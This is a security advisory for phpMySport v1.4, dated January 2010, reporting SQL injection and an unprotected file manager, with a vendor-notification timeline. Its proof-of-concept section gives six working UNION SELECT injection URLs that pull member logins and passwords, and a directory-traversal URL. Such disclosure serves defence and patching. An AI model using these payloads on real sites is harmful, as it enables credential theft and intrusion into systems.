#######################################################################
    Multiple Vulnerabilities in phpMySport v1.4

    Name            	Multiple Vulnerabilities in phpMySport
    Systems Affected    phpMySport v1.4
    site            	http://phpmysport.sourceforge.net/en/
    Author            	Amol Naik (amolnaik4[at]gmail.com)
    Date            	18/01/2010
#######################################################################


############
 OVERVIEW
############

phpMySport v1.4 is vulnerable to following issues:

1. Multiple SQL Injection
2. Unprotected Access to File Manager

####################
 Technical Details
####################

1. Multiple SQL Injection:

Multiple SQL Injection instances exist in phpmysport v1.4 when "magic_quotes_gpc = OFF".

PoC:
+++++

http://localhost/phpmysport/index.php?r=member&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,concat(member_login,0x3a,member_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+pms_member--+-

http://localhost/phpmysport/index.php?r=news&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,concat(member_login,0x3a,member_pass),8,9,10,11,12,13,14,15,16,17+from+pms_member--+-

http://localhost/phpmysport/index.php?r=information&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,concat(member_login,0x3a,member_pass),9,10,11,12,13,14,15,16,17,18,19+from+pms_member--+-

http://localhost/phpmysport/index.php?r=team&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,concat(member_login,0x3a,member_pass),6,7,8+from+pms_member--+-

http://localhost/phpmysport/index.php?r=club&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,concat(member_login,0x3a,member_pass),5,6,7,8,9,10,11,12,13,14+from+pms_member--+-

http://localhost/phpmysport/index.php?r=matches&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(member_login,0x3a,member_pass),20,21,22,23,24,25,26,27,28+from+pms_member--+-



2. Unprotected Access to File Manager:

Access to File manager is unprotected and by using dot-dot-slash (/../../), it is possible to view directory structure of the target system.

PoC:
+++++

http://localhost/phpmysport/index.php?r=file&v1=file_manager&current_folder=/../../../&fen=pop


#############
 TimeLine
#############

Bug Discovered: 01/01/2010
Informed Vendor: 09/01/2010 -- no response received
Public Disclosure: 18/01/2010